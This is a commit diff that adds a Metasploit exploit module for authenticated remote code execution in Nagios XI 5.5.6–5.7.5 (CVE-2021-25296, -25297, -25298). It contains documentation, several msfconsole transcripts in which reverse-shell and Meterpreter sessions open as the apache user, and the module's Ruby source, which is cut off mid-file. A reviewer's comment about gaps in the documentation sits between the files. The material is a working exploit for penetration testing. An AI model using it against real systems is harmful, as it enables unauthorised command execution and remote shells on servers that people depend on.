Land #17494, Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) exploit module
commit
c2e8f3fa69
@ -0,0 +1,451 @@
|
|||
## Vulnerable Application
|
||||
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298: OS command injection vulnerabilities
|
||||
in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
|
||||
on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
|
||||
(`windowswmi`, `switch`, `cloud-vm`). The `windowswmi` configuration wizard is vulnerable
|
||||
to CVE-2021-25296 via command injection in the `plugin_output_len` parameter. `switch` and
|
||||
`cloud-vm` are vulnerable to CVE-2021-25297 and CVE-2021-25298 respectively, and use the
|
||||
`ip_address` parameter, though on version 5.5.7 and prior of NagiosXI this parameter was
|
||||
named `address`.
|
||||
|
||||
The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
|
||||
to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
|
||||
of NagiosXI between versions 5.5.6 and 5.7.5.
|
||||
|
||||
### Installation Steps
|
||||
Note: The module can attempt to complete the configuration steps after NagiosXI has been installed.
|
||||
|
||||
#### Pre-installed OVA
|
||||
1. Download an OVA with NagiosXI installed
|
||||
1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from
|
||||
Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
|
||||
2. To download other vulnerable versions, replace the version number in the URL with the desired version.
|
||||
2. Configure the NagiosXI installation
|
||||
1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
|
||||
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
|
||||
user's password and whether you'd like to force HTTPS.
|
||||
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
|
||||
|
||||
#### Manual Install on Linux
|
||||
Note: NagiosXI can only be installed on specific operating systems (RHEL, CentOS, Oracle Linux, Debian, Ubuntu).
|
||||
Supported version numbers can be found in the installation guide
|
||||
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf). Older versions of
|
||||
NagiosXI might require older versions of the operating systems mentioned. Consult the specific version's documentation if errors occur
|
||||
on newer distributions.
|
||||
|
||||
1. Download NagiosXI
|
||||
1. Choose a version between 5.5.6 and 5.7.5 from [here](https://www.nagios.com/downloads/nagios-xi/older-releases/)
|
||||
2. Install NagiosXI with the following commands
|
||||
1. `tar xzf xi-5.7.5.gz`
|
||||
2. `cd nagiosxi`
|
||||
3. `./fullinstall`
|
||||
3. Configure the NagiosXI installation
|
||||
1. Visit the installed NagiosXI application in a web browser.
|
||||
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
|
||||
user's password and whether you'd like to force HTTPS.
|
||||
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
|
||||
|
||||
### Troubleshooting Installation
|
||||
- NagiosXI doesn't show it's ip address
|
||||
- Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
|
||||
- Ensure it's on a network accessible from your attacking machine (e.g. NAT network instead of Bridged)
|
||||
- NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
|
||||
- The NagiosXI installation is likely out of sync with its date/time.
|
||||
- Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
|
||||
|
||||
## Verification Steps
|
||||
- [ ] Start `msfconsole`
|
||||
- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
|
||||
- [ ] `set RHOSTS TARGET_IP`
|
||||
- [ ] `set RPORT 443`
|
||||
- [ ] `set SSL true`
|
||||
- [ ] `set USERNAME USER`
|
||||
- [ ] `set PASSWORD PASSWORD`
|
||||
- [ ] `set TARGET_CVE CVE-2021-25296`
|
||||
- [ ] `set LHOST YOUR_IP`
|
||||
- [ ] `set LPORT YOUR_LISTENING_PORT`
|
||||
- [ ] `run`
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
A valid NagiosXI username, which can be for an administrator or regular user.
|
||||
|
||||
### PASSWORD
|
||||
The password for the provided NagiosXI username.
|
||||
|
||||
### TARGET_CVE
|
||||
The CVE to target. Each CVE corresponds to a specific target:
|
||||
- CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
|
||||
- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter.
|
||||
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
|
||||
- CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
|
||||
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
|
||||
|
||||
Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
|
||||
URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
|
||||
potentially other values that could be used here.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25296
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FIN
|
||||
set FINGERPRINTCHECK set FINISH_INSTALL
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL true no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.153.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
|
||||
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The Nagios XI license agreement has not yet been signed on the target.
|
||||
[*] Attempting to sign the Nagios XI license agreement...
|
||||
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56222) at 2023-02-07 11:33:53 -0600
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
pwd
|
||||
/usr/local/nagiosxi/html/config
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.153.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56322) at 2023-02-07 11:44:00 -0600
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25298
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25298
|
||||
TARGET_CVE => CVE-2021-25298
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET Linux\ (x64)
|
||||
TARGET => Linux (x64)
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25298 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux (x64)
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 9912
|
||||
LPORT => 9912
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.153.128:9912
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
|
||||
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The Nagios XI license agreement has not yet been signed on the target.
|
||||
[*] Attempting to sign the Nagios XI license agreement...
|
||||
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Sending stage (3045348 bytes) to 192.168.153.132
|
||||
[*] Meterpreter session 1 opened (192.168.153.128:9912 -> 192.168.153.132:32878) at 2023-02-07 11:48:50 -0600
|
||||
|
||||
[*] Command Stager progress - 100.00% done (833/833 bytes)
|
||||
|
||||
meterpreter >
|
||||
meterpreter > getuid
|
||||
Server username: apache
|
||||
meterpreter > getprivs
|
||||
[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdomain
|
||||
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > pwd
|
||||
/usr/local/nagiosxi/html/config
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
|
||||
RHOSTS => 192.168.104.18
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
SSL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
|
||||
LHOST => 192.168.104.2
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
|
||||
LPORT => 8443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
|
||||
g the license agreement.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
|
||||
loit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
|
||||
achine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
|
||||
LPORT 8443 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.104.2:8443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.5.6.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
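Review bot: the Options section documents USERNAME, PASSWORD and TARGET_CVE but not FINISH_INSTALL, even though every scenario sets it and `show options` lists it with the description "If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement."; add a `### FINISH_INSTALL` entry (and a matching Verification Steps line) so the module's behaviour of completing the install and signing the license agreement on the operator's behalf is documented before the first scenario shows it happening. The first CVE-2021-25296 scenario also repeats the `set RHOST`, `set LHOST` and `set FINISH_INSTALL` commands and keeps the tab-completion output (`set FIN` / `set FINGERPRINTCHECK set FINISH_INSTALL`), which should be trimmed from the transcript. Minor wording: "it's ip address" should read "its IP address", and "Login as the `nagiosadmin` user" should read "Log in as the `nagiosadmin` user" in both installation sections.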
|
|
@ -0,0 +1,272 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HTTP::NagiosXi
|
||||
include Msf::Exploit::CmdStager
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
|
||||
'Description' => %q{
|
||||
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
|
||||
OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
|
||||
configuration wizards that allow an authenticated user to perform remote code
|
||||
execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.
|
||||
|
||||
Valid credentials for a Nagios XI user are required. This module has
|
||||
been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Matthew Mathur'
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2021-25296'],
|
||||
['CVE', '2021-25297'],
|
||||
['CVE', '2021-25298'],
|
||||
['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
|
||||
],
|
||||
'Platform' => %w[linux unix],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
|
||||
'Targets' => [
|
||||
[
|
||||
'Linux (x86)', {
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
|
||||
}
|
||||
],
|
||||
[
|
||||
'Linux (x64)', {
|
||||
'Arch' => [ ARCH_X64 ],
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
|
||||
}
|
||||
],
|
||||
[
|
||||
'CMD', {
|
||||
'Arch' => [ ARCH_CMD ],
|
||||
'Platform' => 'unix',
|
||||
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 2,
|
||||
'DisclosureDate' => '2021-02-13',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
|
||||
'Reliability' => [ REPEATABLE_SESSION ]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options [
|
||||
OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
|
||||
]
|
||||
end
|
||||
|
||||
def username
|
||||
datastore['USERNAME']
|
||||
end
|
||||
|
||||
def password
|
||||
datastore['PASSWORD']
|
||||
end
|
||||
|
||||
def finish_install
|
||||
datastore['FINISH_INSTALL']
|
||||
end
|
||||
|
||||
# Returns a status code an a error message on failure.
|
||||
# On success returns the status code and an array so we
|
||||
# can update the login_result and res_array variables appropriately.
|
||||
def handle_unsigned_license(res_array, username, password, finish_install)
|
||||
auth_cookies, nsp = res_array
|
||||
sign_license_result = sign_license_agreement(auth_cookies, nsp)
|
||||
if sign_license_result
|
||||
return 5, 'Failed to sign license agreement'
|
||||
end
|
||||
|
||||
print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
|
||||
sleep 5
|
||||
login_result, res_array = login_after_install_or_license(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..4 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 5 # The Nagios XI license agreement still has not been signed
|
||||
return 5, 'Failed to sign the license agreement.'
|
||||
end
|
||||
|
||||
return login_result, res_array
|
||||
end
|
||||
|
||||
def authenticate
|
||||
# Use nagios_xi_login to try and authenticate.
|
||||
login_result, res_array = nagios_xi_login(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..3 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 4 # Nagios XI is not fully installed
|
||||
install_result = install_nagios_xi(password)
|
||||
if install_result # On installation failure, result is an array with the code and error message
|
||||
return install_result[0], install_result[1]
|
||||
end
|
||||
|
||||
login_result, res_array = login_after_install_or_license(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..4 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
end
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
end
|
||||
|
||||
print_good('Successfully authenticated to Nagios XI.')
|
||||
# Extract the authenticated cookies and nsp to use throughout the module
|
||||
if res_array.length == 2
|
||||
auth_cookies = res_array[1]
|
||||
if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
|
||||
@auth_cookies = auth_cookies
|
||||
else
|
||||
return login_result, 'Failed to extract authentication cookies'
|
||||
end
|
||||
nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
|
||||
if nsp
|
||||
@nsp = nsp[1]
|
||||
else
|
||||
return login_result, 'Failed to extract nsp string'
|
||||
end
|
||||
else
|
||||
return login_result, 'Failed to extract auth cookies and nsp string'
|
||||
end
|
||||
|
||||
# Set the version here so both check and exploit can use it
|
||||
nagios_version = nagios_xi_version(res_array[0])
|
||||
if nagios_version.nil?
|
||||
return 6, 'Unable to obtain the Nagios XI version from the dashboard'
|
||||
end
|
||||
|
||||
print_status("Target is Nagios XI with version #{nagios_version}.")
|
||||
|
||||
# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
|
||||
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
|
||||
